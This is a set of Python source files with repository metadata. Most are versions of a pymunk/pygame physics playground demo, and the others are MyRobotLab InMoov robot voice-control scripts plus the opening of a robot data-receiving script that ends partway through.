elif event.type == pygame.KEYUP and event.key in (
pygame.K_RSHIFT,
pygame.K_LSHIFT,
):
### Create Polygon
if len(self.poly_points) > 0:
self.poly_points = u.reduce_poly(self.poly_points, tolerance=5)
if len(self.poly_points) > 2:
self.poly_points = u.convex_hull(self.poly_points)
if not u.is_clockwise(self.poly_points):
self.poly_points.reverse()
center = u.calc_center(self.poly_points)
self.poly_points = u.poly_vectors_around_center(self.poly_points)
self.polys.append(self.create_poly(self.poly_points, pos=center))
self.poly_points = []
elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
self.run_physics = not self.run_physics
elif event.type == pygame.KEYDOWN and event.key == pygame.K_k:
for x in range(-100, 100, 25):
for y in range(-100, 100, 25):
p = pygame.mouse.get_pos()
p = Vec2d(*self.flipyv(Vec2d(*p))) + (x, y)
self.polys.append(self.create_box(pos=p))
elif event.type == pygame.KEYDOWN and event.key == pygame.K_b:
p = self.flipyv(Vec2d(*pygame.mouse.get_pos()))
self.polys.append(self.create_box(p, size=10, mass=1))
elif event.type == pygame.KEYDOWN and event.key == pygame.K_f:
bp = Vec2d(100, 500)
p = self.flipyv(Vec2d(*pygame.mouse.get_pos())) - bp
ball = self.create_ball(bp)
p = p.normalized()
ball.body.apply_impulse_at_local_point(p * 1000, (0, 0))
self.balls.append(ball)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_g:
g = self.space.gravity
self.space.gravity = g.rotated_degrees(45)
mpos = pygame.mouse.get_pos()
if pygame.key.get_mods() & pygame.KMOD_SHIFT and pygame.mouse.get_pressed()[2]:
p = self.flipyv(Vec2d(*mpos))
self.poly_points.append(p)
hit = self.space.point_query_nearest(
self.flipyv(Vec2d(*mpos)), 0, pm.ShapeFilter()
)
if hit != None:
self.shape_to_remove = hit.shape
else:
self.shape_to_remove = None
### Update physics
if self.run_physics:
x = 1
dt = 1.0 / 60.0 / x
for x in range(x):
self.space.step(dt)
for ball in self.balls:
# ball.body.reset_forces()
pass
for poly in self.polys:
# poly.body.reset_forces()
pass
### Draw stuff
self.draw()
### Check for objects outside of the screen, we can remove those
# Balls
xs = []
for ball in self.balls:
if (
ball.body.position.x < -1000
or ball.body.position.x > 1000
or ball.body.position.y < -1000
or ball.body.position.y > 1000
):
xs.append(ball)
for ball in xs:
self.space.remove(ball, ball.body)
self.balls.remove(ball)
# Polys
xs = []
for poly in self.polys:
if (
poly.body.position.x < -1000
or poly.body.position.x > 1000
or poly.body.position.y < -1000
or poly.body.position.y > 1000
):
xs.append(poly)
for poly in xs:
self.space.remove(poly, poly.body)
self.polys.remove(poly)
### Tick clock and update fps in title
self.clock.tick(50)
pygame.display.set_caption("fps: " + str(self.clock.get_fps()))
def main():
demo = PhysicsDemo()
demo.run()
if __name__ == "__main__":
doprof = 0
if not doprof:
main()
else:
import cProfile
import pstats
prof = cProfile.run("main()", "profile.prof")
stats = pstats.Stats("profile.prof")
stats.strip_dirs()
stats.sort_stats("cumulative", "time", "calls")
stats.print_stats(30)
| {
"repo_name": "viblo/pymunk",
"path": "examples/playground.py",
"copies": "1",
"size": "12446",
"license": "mit",
"hash": -3578279751607315000,
"line_mean": 33.9606741573,
"line_max": 116,
"alpha_frac": 0.5207295517,
"autogenerated": false,
"ratio": 3.6127721335268506,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.463350168522685,
"avg_score": null,
"num_lines": null
} |
"""A basic playground. Most interesting function is draw a shape, basically
move the mouse as you want and pymunk will approximate a Poly shape from the
drawing.
"""
__version__ = "$Id:$"
__docformat__ = "reStructuredText"
import pygame
from pygame.locals import *
from pygame.color import *
import pymunk as pm
from pymunk import Vec2d
import pymunk.util as u
#TODO: Clean up code
COLLTYPE_DEFAULT = 0
COLLTYPE_MOUSE = 1
class PhysicsDemo:
def flipyv(self, v):
return int(v.x), int(-v.y+self.h)
def __init__(self):
self.running = True
### Init pygame and create screen
pygame.init()
self.w, self.h = 600,600
self.screen = pygame.display.set_mode((self.w, self.h))
self.clock = pygame.time.Clock()
### Init pymunk and create space
self.space = pm.Space()
self.space.gravity = (0.0, -900.0)
### Walls
self.walls = []
self.create_wall_segments( map(Vec2d, [(100, 50), (500, 50)]) )
## Balls
#balls = [createBall(space, (100,300))]
self.balls = []
### Polys
self.polys = []
h = 10
for y in range(1,h):
#for x in range(1, y):
x = 0
s = 10
p = Vec2d(300,40) + Vec2d(0, y*s*2)
self.polys.append(self.create_box(p, size=s, mass = 1))
self.run_physics = True
### Wall under construction
self.wall_points = []
### Poly under construction
self.poly_points = []
self.shape_to_remove = None
self.mouse_contact = None
def draw_helptext(self):
font = pygame.font.Font(None, 16)
text = ["LMB: Create ball"
,"LMB + Shift: Create box"
,"RMB on object: Remove object"
,"RMB(hold) + Shift: Create polygon, release to finish (we be converted to a convex hull of the points)"
,"RMB + Ctrl: Create wall, release to finish"
,"Space: Stop physics simulation"
,"k: Spawn a bunch of blocks"
,"f: Fire a ball from the top left corner"
]
y = 5
for line in text:
text = font.render(line, 1,THECOLORS["black"])
self.screen.blit(text, (5,y))
y += 10
def create_ball(self, point, mass=1.0, radius=15.0):
moment = pm.moment_for_circle(mass, radius, 0.0, Vec2d(0,0))
ball_body = pm.Body(mass, moment)
ball_body.position = Vec2d(point)
ball_shape = pm.Circle(ball_body, radius, Vec2d(0,0))
ball_shape.friction = 1.5
ball_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(ball_body, ball_shape)
return ball_shape
def create_box(self, pos, size = 10, mass = 5.0):
box_points = map(Vec2d, [(-size, -size), (-size, size), (size,size), (size, -size)])
return self.create_poly(box_points, mass = mass, pos = pos)
def create_poly(self, points, mass = 5.0, pos = (0,0)):
moment = pm.moment_for_poly(mass,points, Vec2d(0,0))
#moment = 1000
body = pm.Body(mass, moment)
body.position = Vec2d(pos)
print body.position
shape = pm.Poly(body, points, Vec2d(0,0))
shape.friction = 0.5
shape.collision_type = COLLTYPE_DEFAULT
self.space.add(body, shape)
return shape
def create_wall_segments(self, points):
"""Create a number of wall segments connecting the points"""
if len(points) < 2:
return []
points = map(Vec2d, points)
for i in range(len(points)-1):
v1 = Vec2d(points[i].x, points[i].y)
v2 = Vec2d(points[i+1].x, points[i+1].y)
wall_body = pm.Body()
wall_shape = pm.Segment(wall_body, v1, v2, .0)
wall_shape.friction = 1.0
wall_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(wall_shape)
self.walls.append(wall_shape)
def run(self):
while self.running:
self.loop()
def draw_ball(self, ball):
body = ball.body
v = body.position + ball.offset.cpvrotate(body.rotation_vector)
p = self.flipyv(v)
r = ball.radius
pygame.draw.circle(self.screen, THECOLORS["blue"], p, int(r), 2)
def draw_wall(self, wall):
body = wall.body
pv1 = self.flipyv(body.position + wall.a.cpvrotate(body.rotation_vector))
pv2 = self.flipyv(body.position + wall.b.cpvrotate(body.rotation_vector))
pygame.draw.lines(self.screen, THECOLORS["lightgray"], False, [pv1,pv2])
def draw_poly(self, poly):
body = poly.body
ps = poly.get_vertices()
ps.append(ps[0])
ps = map(self.flipyv, ps)
if u.is_clockwise(ps):
color = THECOLORS["green"]
else:
color = THECOLORS["red"]
pygame.draw.lines(self.screen, color, False, ps)
def draw(self):
### Clear the screen
self.screen.fill(THECOLORS["white"])
### Display some text
self.draw_helptext()
### Draw balls
for ball in self.balls:
self.draw_ball(ball)
### Draw walls
for wall in self.walls:
self.draw_wall(wall)
### Draw polys
for poly in self.polys:
self.draw_poly(poly)
### Draw Uncompleted walls
if len(self.wall_points) > 1:
ps = [self.flipyv(Vec2d(p)) for p in self.wall_points]
pygame.draw.lines(self.screen, THECOLORS["gray"], False, ps, 2)
### Uncompleted poly
if len(self.poly_points) > 1:
ps = [self.flipyv(Vec2d(p)) for p in self.poly_points]
pygame.draw.lines(self.screen, THECOLORS["red"], False, ps, 2)
### Mouse Contact
if self.mouse_contact is not None:
p = self.flipyv(self.mouse_contact)
pygame.draw.circle(self.screen, THECOLORS["red"], p, 3)
### All done, lets flip the display
pygame.display.flip()
def loop(self):
for event in pygame.event.get():
if event.type == QUIT:
self.running = False
elif event.type == KEYDOWN and event.key == K_ESCAPE:
self.running = False
elif event.type == KEYDOWN and event.key == K_p:
pygame.image.save(self.screen, "playground.png")
elif event.type == MOUSEBUTTONDOWN and event.button == 1: # LMB
if pygame.key.get_mods() & KMOD_SHIFT:
p = self.flipyv(Vec2d(event.pos))
self.polys.append(self.create_box(pos = p))
else:
#t = -10000
p = self.flipyv(Vec2d(event.pos))
self.balls.append(self.create_ball(p))
print p
elif event.type == MOUSEBUTTONDOWN and event.button == 3: #RMB
if pygame.key.get_mods() & KMOD_SHIFT:
pass
elif pygame.key.get_mods() & KMOD_CTRL:
p = self.flipyv(Vec2d(event.pos))
self.wall_points.append(p)
elif self.shape_to_remove is not None:
print self.shape_to_remove
self.balls = filter(lambda a: a != self.shape_to_remove, self.balls)
self.walls = filter(lambda a: a != self.shape_to_remove, self.walls)
self.polys = filter(lambda a: a != self.shape_to_remove, self.polys)
self.space.remove(self.shape_to_remove.body, self.shape_to_remove)
elif event.type == KEYUP and event.key in (K_RCTRL, K_LCTRL):
### Create Wall
self.create_wall_segments(self.wall_points)
self.wall_points = []
elif event.type == KEYUP and event.key in (K_RSHIFT, K_LSHIFT):
### Create Polygon
if len(self.poly_points) > 0:
self.poly_points = u.reduce_poly(self.poly_points, tolerance=5)
if len(self.poly_points) > 2:
self.poly_points = u.convex_hull(self.poly_points)
if not u.is_clockwise(self.poly_points):
self.poly_points.reverse()
center = u.calc_center(self.poly_points)
self.poly_points = u.poly_vectors_around_center(self.poly_points)
self.polys.append(self.create_poly(self.poly_points, pos=center))
self.poly_points = []
elif event.type == KEYDOWN and event.key == K_SPACE:
self.run_physics = not self.run_physics
elif event.type == KEYDOWN and event.key == K_k:
for x in range (-100,100,25):
for y in range(-100,100,25):
p = pygame.mouse.get_pos()
p = self.flipyv(Vec2d(p)) + (x,y)
self.polys.append(self.create_box(pos=p))
elif event.type == KEYDOWN and event.key == K_b:
p = flipyv(Vec2d(pygame.mouse.get_pos()))
self.polys.append(self.create_box(p, size=10, mass = 1))
elif event.type == KEYDOWN and event.key == K_f:
bp = Vec2d(100,500)
p = self.flipyv(Vec2d(pygame.mouse.get_pos())) -bp
ball = self.create_ball(bp)
p = p.normalized()
ball.body.apply_impulse(p*1000, (0,0))
self.balls.append(ball)
elif event.type == KEYDOWN and event.key == K_g:
g = self.space.gravity
g.rotate(45)
self.space.gravity = g
mpos = pygame.mouse.get_pos()
if pygame.key.get_mods() & KMOD_SHIFT and pygame.mouse.get_pressed()[2]:
p = self.flipyv(Vec2d(mpos))
self.poly_points.append(p)
self.shape_to_remove = self.space.point_query_first( self.flipyv(Vec2d(mpos)) )
### Update physics
if self.run_physics:
x = 1
dt = 1.0/60.0/x
for x in range(x):
self.space.step(dt)
for ball in self.balls:
#ball.body.reset_forces()
pass
for poly in self.polys:
#poly.body.reset_forces()
pass
### Draw stuff
self.draw()
### Check for objects outside of the screen, we can remove those
# Balls
xs = []
for ball in self.balls:
if ball.body.position.x < -1000 or ball.body.position.x > 1000 \
or ball.body.position.y < -1000 or ball.body.position.y > 1000:
xs.append(ball)
for ball in xs:
self.space.remove(ball, ball.body)
self.balls.remove(ball)
# Polys
xs = []
for poly in self.polys:
if poly.body.position.x < -1000 or poly.body.position.x > 1000 \
or poly.body.position.y < -1000 or poly.body.position.y > 1000:
xs.append(poly)
for poly in xs:
self.space.remove(poly, poly.body)
self.polys.remove(poly)
### Tick clock and update fps in title
self.clock.tick(50)
pygame.display.set_caption("fps: " + str(self.clock.get_fps()))
def main():
demo = PhysicsDemo()
demo.run()
if __name__ == '__main__':
doprof = 0
if not doprof:
main()
else:
import cProfile, pstats
prof = cProfile.run("main()", "profile.prof")
stats = pstats.Stats("profile.prof")
stats.strip_dirs()
stats.sort_stats('cumulative', 'time', 'calls')
stats.print_stats(30)
| {
"repo_name": "imanolarrieta/angrybirds",
"path": "pymunk-4.0.0/examples/playground.py",
"copies": "5",
"size": "12298",
"license": "mit",
"hash": 6784726544429606000,
"line_mean": 35.7104477612,
"line_max": 120,
"alpha_frac": 0.5090258579,
"autogenerated": false,
"ratio": 3.6449318316538233,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6653957689553823,
"avg_score": null,
"num_lines": null
} |
"""A basic playground. Most interesting function is draw a shape, basically
move the mouse as you want and pymunk will approximate a Poly shape from the
drawing.
"""
__version__ = "$Id:$"
__docformat__ = "reStructuredText"
import pygame
from pygame.locals import *
from pygame.color import *
import pymunk as pm
from pymunk import Vec2d
import pymunk.util as u
#TODO: Clean up code
COLLTYPE_DEFAULT = 0
COLLTYPE_MOUSE = 1
class PhysicsDemo:
def flipyv(self, v):
return int(v.x), int(-v.y+self.h)
def __init__(self):
self.running = True
### Init pygame and create screen
pygame.init()
self.w, self.h = 600,600
self.screen = pygame.display.set_mode((self.w, self.h))
self.clock = pygame.time.Clock()
### Init pymunk and create space
self.space = pm.Space()
self.space.gravity = (0.0, -900.0)
### Walls
self.walls = []
self.create_wall_segments( map(Vec2d, [(100, 50), (500, 50)]) )
## Balls
#balls = [createBall(space, (100,300))]
self.balls = []
### Polys
self.polys = []
h = 10
for y in range(1,h):
#for x in range(1, y):
x = 0
s = 10
p = Vec2d(300,40) + Vec2d(0, y*s*2)
self.polys.append(self.create_box(p, size=s, mass = 1))
self.run_physics = True
### Wall under construction
self.wall_points = []
### Poly under construction
self.poly_points = []
self.shape_to_remove = None
self.mouse_contact = None
def draw_helptext(self):
font = pygame.font.Font(None, 16)
text = ["LMB: Create ball"
,"LMB + Shift: Create box"
,"RMB on object: Remove object"
,"RMB(hold) + Shift: Create polygon, release to finish (we be converted to a convex hull of the points)"
,"RMB + Ctrl: Create wall, release to finish"
,"Space: Stop physics simulation"
,"k: Spawn a bunch of blocks"
,"f: Fire a ball from the top left corner"
]
y = 5
for line in text:
text = font.render(line, 1,THECOLORS["black"])
self.screen.blit(text, (5,y))
y += 10
def create_ball(self, point, mass=1.0, radius=15.0):
moment = pm.moment_for_circle(mass, radius, 0.0, Vec2d(0,0))
ball_body = pm.Body(mass, moment)
ball_body.position = Vec2d(point)
ball_shape = pm.Circle(ball_body, radius, Vec2d(0,0))
ball_shape.friction = 1.5
ball_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(ball_body, ball_shape)
return ball_shape
def create_box(self, pos, size = 10, mass = 5.0):
box_points = map(Vec2d, [(-size, -size), (-size, size), (size,size), (size, -size)])
return self.create_poly(box_points, mass = mass, pos = pos)
def create_poly(self, points, mass = 5.0, pos = (0,0)):
moment = pm.moment_for_poly(mass,points, Vec2d(0,0))
#moment = 1000
body = pm.Body(mass, moment)
body.position = Vec2d(pos)
print body.position
shape = pm.Poly(body, points, Vec2d(0,0))
shape.friction = 0.5
shape.collision_type = COLLTYPE_DEFAULT
self.space.add(body, shape)
return shape
def create_wall_segments(self, points):
"""Create a number of wall segments connecting the points"""
if len(points) < 2:
return []
points = map(Vec2d, points)
for i in range(len(points)-1):
v1 = Vec2d(points[i].x, points[i].y)
v2 = Vec2d(points[i+1].x, points[i+1].y)
wall_body = pm.Body()
wall_shape = pm.Segment(wall_body, v1, v2, .0)
wall_shape.friction = 1.0
wall_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(wall_shape)
self.walls.append(wall_shape)
def run(self):
while self.running:
self.loop()
def draw_ball(self, ball):
body = ball.body
v = body.position + ball.offset.cpvrotate(body.rotation_vector)
p = self.flipyv(v)
r = ball.radius
pygame.draw.circle(self.screen, THECOLORS["blue"], p, r, 2)
def draw_wall(self, wall):
body = wall.body
pv1 = self.flipyv(body.position + wall.a.cpvrotate(body.rotation_vector))
pv2 = self.flipyv(body.position + wall.b.cpvrotate(body.rotation_vector))
pygame.draw.lines(self.screen, THECOLORS["lightgray"], False, [pv1,pv2])
def draw_poly(self, poly):
body = poly.body
ps = poly.get_points()
ps.append(ps[0])
ps = map(self.flipyv, ps)
if u.is_clockwise(ps):
color = THECOLORS["green"]
else:
color = THECOLORS["red"]
pygame.draw.lines(self.screen, color, False, ps)
def draw(self):
### Clear the screen
self.screen.fill(THECOLORS["white"])
### Display some text
self.draw_helptext()
### Draw balls
for ball in self.balls:
self.draw_ball(ball)
### Draw walls
for wall in self.walls:
self.draw_wall(wall)
### Draw polys
for poly in self.polys:
self.draw_poly(poly)
### Draw Uncompleted walls
if len(self.wall_points) > 1:
ps = [self.flipyv(Vec2d(p)) for p in self.wall_points]
pygame.draw.lines(self.screen, THECOLORS["gray"], False, ps, 2)
### Uncompleted poly
if len(self.poly_points) > 1:
ps = [self.flipyv(Vec2d(p)) for p in self.poly_points]
pygame.draw.lines(self.screen, THECOLORS["red"], False, ps, 2)
### Mouse Contact
if self.mouse_contact is not None:
p = self.flipyv(self.mouse_contact)
pygame.draw.circle(self.screen, THECOLORS["red"], p, 3)
### All done, lets flip the display
pygame.display.flip()
def loop(self):
for event in pygame.event.get():
if event.type == QUIT:
self.running = False
elif event.type == KEYDOWN and event.key == K_ESCAPE:
self.running = False
elif event.type == KEYDOWN and event.key == K_p:
pygame.image.save(self.screen, "playground.png")
elif event.type == MOUSEBUTTONDOWN and event.button == 1: # LMB
if pygame.key.get_mods() & KMOD_SHIFT:
p = self.flipyv(Vec2d(event.pos))
self.polys.append(self.create_box(pos = p))
else:
#t = -10000
p = self.flipyv(Vec2d(event.pos))
self.balls.append(self.create_ball(p))
print p
elif event.type == MOUSEBUTTONDOWN and event.button == 3: #RMB
if pygame.key.get_mods() & KMOD_SHIFT:
pass
elif pygame.key.get_mods() & KMOD_CTRL:
p = self.flipyv(Vec2d(event.pos))
self.wall_points.append(p)
elif self.shape_to_remove is not None:
print self.shape_to_remove
self.balls = filter(lambda a: a != self.shape_to_remove, self.balls)
self.walls = filter(lambda a: a != self.shape_to_remove, self.walls)
self.polys = filter(lambda a: a != self.shape_to_remove, self.polys)
self.space.remove(self.shape_to_remove.body, self.shape_to_remove)
elif event.type == KEYUP and event.key in (K_RCTRL, K_LCTRL):
### Create Wall
self.create_wall_segments(self.wall_points)
self.wall_points = []
elif event.type == KEYUP and event.key in (K_RSHIFT, K_LSHIFT):
### Create Polygon
if len(self.poly_points) > 0:
self.poly_points = u.reduce_poly(self.poly_points, tolerance=5)
if len(self.poly_points) > 2:
self.poly_points = u.convex_hull(self.poly_points)
if not u.is_clockwise(self.poly_points):
self.poly_points.reverse()
center = u.calc_center(self.poly_points)
self.poly_points = u.poly_vectors_around_center(self.poly_points)
self.polys.append(self.create_poly(self.poly_points, pos=center))
self.poly_points = []
elif event.type == KEYDOWN and event.key == K_SPACE:
self.run_physics = not self.run_physics
elif event.type == KEYDOWN and event.key == K_k:
for x in range (-100,100,25):
for y in range(-100,100,25):
p = pygame.mouse.get_pos()
p = self.flipyv(Vec2d(p)) + (x,y)
self.polys.append(self.create_box(pos=p))
elif event.type == KEYDOWN and event.key == K_b:
p = flipyv(Vec2d(pygame.mouse.get_pos()))
self.polys.append(self.create_box(p, size=10, mass = 1))
elif event.type == KEYDOWN and event.key == K_f:
bp = Vec2d(100,500)
p = self.flipyv(Vec2d(pygame.mouse.get_pos())) -bp
ball = self.create_ball(bp)
p = p.normalized()
ball.body.apply_impulse(p*1000, (0,0))
self.balls.append(ball)
elif event.type == KEYDOWN and event.key == K_g:
g = self.space.gravity
g.rotate(45)
self.space.gravity = g
mpos = pygame.mouse.get_pos()
if pygame.key.get_mods() & KMOD_SHIFT and pygame.mouse.get_pressed()[2]:
p = self.flipyv(Vec2d(mpos))
self.poly_points.append(p)
self.shape_to_remove = self.space.point_query_first( self.flipyv(Vec2d(mpos)) )
### Update physics
if self.run_physics:
x = 1
dt = 1.0/60.0/x
for x in range(x):
self.space.step(dt)
for ball in self.balls:
#ball.body.reset_forces()
pass
for poly in self.polys:
#poly.body.reset_forces()
pass
### Draw stuff
self.draw()
### Check for objects outside of the screen, we can remove those
# Balls
xs = []
for ball in self.balls:
if ball.body.position.x < -1000 or ball.body.position.x > 1000 \
or ball.body.position.y < -1000 or ball.body.position.y > 1000:
xs.append(ball)
for ball in xs:
self.space.remove(ball, ball.body)
self.balls.remove(ball)
# Polys
xs = []
for poly in self.polys:
if poly.body.position.x < -1000 or poly.body.position.x > 1000 \
or poly.body.position.y < -1000 or poly.body.position.y > 1000:
xs.append(poly)
for poly in xs:
self.space.remove(poly, poly.body)
self.polys.remove(poly)
### Tick clock and update fps in title
self.clock.tick(50)
pygame.display.set_caption("fps: " + str(self.clock.get_fps()))
def main():
demo = PhysicsDemo()
demo.run()
if __name__ == '__main__':
doprof = 0
if not doprof:
main()
else:
import cProfile, pstats
prof = cProfile.run("main()", "profile.prof")
stats = pstats.Stats("profile.prof")
stats.strip_dirs()
stats.sort_stats('cumulative', 'time', 'calls')
stats.print_stats(30)
| {
"repo_name": "cfobel/python___pymunk",
"path": "examples/playground.py",
"copies": "1",
"size": "12622",
"license": "mit",
"hash": 8670299500612371000,
"line_mean": 35.6895522388,
"line_max": 120,
"alpha_frac": 0.4955633022,
"autogenerated": false,
"ratio": 3.72220583898555,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.471776914118555,
"avg_score": null,
"num_lines": null
} |
# a basic script for starting the InMoov service
# and attaching the right hand
# an Arduino is required, additionally a computer
# with a microphone and speakers is needed for voice
# control and speech synthesis
# ADD SECOND STAGE CONFIRMATION
# instead of saying: you said... it would say: did you say...? and I would confirm with yes or give the voice command again
# face tracking in InMoov ... activated by voice ...
inMoov = Runtime.createAndStart("inMoov", "InMoov")
rightSerialPort = "COM8"
leftSerialPort = "COM7"
cameraIndex = 1
# attach an arduinos to InMoov
# possible board types include uno atmega168 atmega328p atmega2560 atmega1280 atmega32u4
# the MRLComm.ino sketch must be loaded into the Arduino for MyRobotLab control
inMoov.attachArduino("right","uno",rightSerialPort)
inMoov.attachHand("right")
inMoov.attachArm("right")
inMoov.attachArduino("left","atmega1280", leftSerialPort)
inMoov.attachHand("left")
inMoov.attachArm("left")
inMoov.attachHead("left")
# system check
inMoov.systemCheck()
inMoov.rest()
inMoov.setCameraIndex(cameraIndex)
# new process for verbal commands
ear = inMoov.getEar()
ear.addCommand("rest", inMoov.getName(), "rest")
ear.addCommand("open hand", inMoov.getName(), "handOpen", "both")
ear.addCommand("close hand", inMoov.getName(), "handClose", "both")
ear.addCommand("camera on", inMoov.getName(), "cameraOn")
# ear.addCommand("off camera", inMoov.getName(), "cameraOff") - needs fixing
ear.addCommand("capture gesture", inMoov.getName(), "captureGesture")
ear.addCommand("track", inMoov.getName(), "track")
ear.addCommand("freeze track", inMoov.getName(), "clearTrackingPoints")
ear.addCommand("hello", inMoov.getName(), "hello")
ear.addCommand("giving", inMoov.getName(), "giving")
ear.addCommand("fighter", inMoov.getName(), "fighter")
ear.addCommand("fist hips", inMoov.getName(), "fistHips")
ear.addCommand("look at this", inMoov.getName(), "lookAtThis")
ear.addCommand("victory", inMoov.getName(), "victory")
ear.addCommand("arms up", inMoov.getName(), "armsUp")
ear.addCommand("arms front", inMoov.getName(), "armsFront")
ear.addCommand("da vinci", inMoov.getName(), "daVinci")
ear.addCommand("manual", ear.getName(), "lockOutAllGrammarExcept", "voice control")
ear.addCommand("voice control", ear.getName(), "clearLock")
ear.addCommand("stop listening", ear.getName(), "stopListening")
ear.addCommand("ok", "python", "ok")
ear.addComfirmations("yes","correct","yeah","ya")
ear.addNegations("no","wrong","nope","nah")
ear.startListening()
def ok():
inMoov.setHandSpeed("left", 0.30, 0.30, 1.0, 1.0, 1.0, 1.0)
inMoov.setHandSpeed("right", 1.0, 1.0, 1.0, 1.0, 1.0, 1.0)
inMoov.setArmSpeed("left", 0.75, 0.75, 0.75, 0.95)
inMoov.setArmSpeed("right", 1.0, 1.0, 1.0, 1.0)
inMoov.setHeadSpeed(0.65, 0.75)
inMoov.moveHead(88,79)
inMoov.moveArm("left",89,75,93,11)
inMoov.moveArm("right",0,91,28,17)
inMoov.moveHand("left",92,106,4,0,0,34)
inMoov.moveHand("right",86,51,133,162,153,180)
| {
"repo_name": "sujitbehera27/MyRoboticsProjects-Arduino",
"path": "src/resource/Python/examples/InMoov.full.py",
"copies": "3",
"size": "2973",
"license": "apache-2.0",
"hash": 5072647497137523000,
"line_mean": 38.64,
"line_max": 124,
"alpha_frac": 0.7285570131,
"autogenerated": false,
"ratio": 2.675967596759676,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9831587738568146,
"avg_score": 0.014587374258305892,
"num_lines": 75
} |
# a basic script for starting the InMoov service
# and attaching the right hand
# an Arduino is required, additionally a computer
# with a microphone and speakers is needed for voice
# control and speech synthesis
inMoov = Runtime.createAndStart("inMoov", "InMoov")
# attach an arduino to InMoov
# possible board types include uno atmega168 atmega328p atmega2560 atmega1280 atmega32u4
# the MRLComm.ino sketch must be loaded into the Arduino for MyRobotLab control
# set COM number according to the com of your Arduino board
inMoov.attachArduino("right","uno","COM13")
inMoov.attachHand("right")
# setting speech's language
# regrettably voice recognition is only in
# English
# inMoov.setLanguage("fr")
# inMoov.setLanguage("it")
inMoov.setLanguage("en")
# system check
inMoov.systemCheck()
inMoov.rest()
# listen for these key words
inMoov.startListening("rest | open hand | close hand | one | two | three | four | five | manual | voice control| capture gesture")
# voice control
def heard():
data = msg_ear_recognized.data[0]
print "heard ", data
#mouth.setLanguage("fr")
mouth.speak("you said " + data)
if (data == "rest"):
inMoov.rest()
elif (data == "open hand"):
inMoov.handOpen("right")
elif (data == "close hand"):
inMoov.handClose("right")
elif (data == "manual"):
inMoov.lockOutAllGrammarExcept("voice control")
elif (data == "voice control"):
inMoov.clearGrammarLock()
elif (data == "capture gesture"):
inMoov.captureGesture();
inMoov.moveHand("right",50,28,30,10,10,90)
def gestureOne():
inMoov.moveHead(90,90)
inMoov.moveArm("left",90,64,128,43)
inMoov.moveArm("right",0,73,29,15)
inMoov.moveHand("left",50,28,30,10,10,90)
inMoov.moveHand("right",10,10,10,10,10,90) | {
"repo_name": "DarkRebel/myrobotlab",
"path": "src/resource/Python/examples/InMoov.right.hand.py",
"copies": "2",
"size": "1926",
"license": "apache-2.0",
"hash": 6884017166681605000,
"line_mean": 9.5536723164,
"line_max": 130,
"alpha_frac": 0.6490134995,
"autogenerated": false,
"ratio": 2.568,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.42170134995,
"avg_score": null,
"num_lines": null
} |
# a basic script for starting the InMoov service
# and attaching the right hand
# an Arduino is required, additionally a computer
# with a microphone and speakers is needed for voice
# control and speech synthesis
inMoov = Runtime.createAndStart("inMoov", "InMoov")
# attach an arduino to InMoov
# possible board types include uno atmega168 atmega328p atmega2560 atmega1280 atmega32u4
# the MRLComm.ino sketch must be loaded into the Arduino for MyRobotLab control
# set COM number according to the com of your Arduino board
inMoov.attachArduino("right","uno","COM13")
inMoov.attachHand("right")
# setting speech's language
# regrettably voice recognition is only in
# English
# inMoov.setLanguage("fr")
# inMoov.setLanguage("it")
inMoov.setLanguage("en")
# system check
inMoov.systemCheck()
inMoov.rest()
# listen for these key words
inMoov.startListening("rest | open hand | close hand | one | two | three | four | five | manual | voice control| capture gesture")
# voice control
def heard():
data = msg_ear_recognized.data[0]
print "heard ", data
#mouth.setLanguage("fr")
mouth.speak("you said " + data)
if (data == "rest"):
inMoov.rest()
elif (data == "open hand"):
inMoov.handOpen("right")
elif (data == "close hand"):
inMoov.handClose("right")
elif (data == "manual"):
inMoov.lockOutAllGrammarExcept("voice control")
elif (data == "voice control"):
inMoov.clearGrammarLock()
elif (data == "capture gesture"):
inMoov.captureGesture();
inMoov.moveHand("right",50,28,30,10,10,90)
def gestureOne():
inMoov.moveHead(90,90)
inMoov.moveArm("left",90,64,128,43)
inMoov.moveArm("right",0,73,29,15)
inMoov.moveHand("left",50,28,30,10,10,90)
inMoov.moveHand("right",10,10,10,10,10,90) | {
"repo_name": "mecax/pyrobotlab",
"path": "toSort/InMoov.right.hand.py",
"copies": "1",
"size": "1985",
"license": "apache-2.0",
"hash": -2543813005616323600,
"line_mean": 7.1652542373,
"line_max": 130,
"alpha_frac": 0.6297229219,
"autogenerated": false,
"ratio": 2.453646477132262,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8385566688936028,
"avg_score": 0.03956054201924683,
"num_lines": 60
} |
"""A basic script to demonstrate usage of the cb2_receive module.
There are a few lines which are commented out. Uncomment these lines to see a
demonstration of the parallel nature of the cb2_receive module."""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import time
from contextlib import closing
import cb2_receive
import argparse
def main():
# Parse in arguments
parser = argparse.ArgumentParser(
description='Save Points',
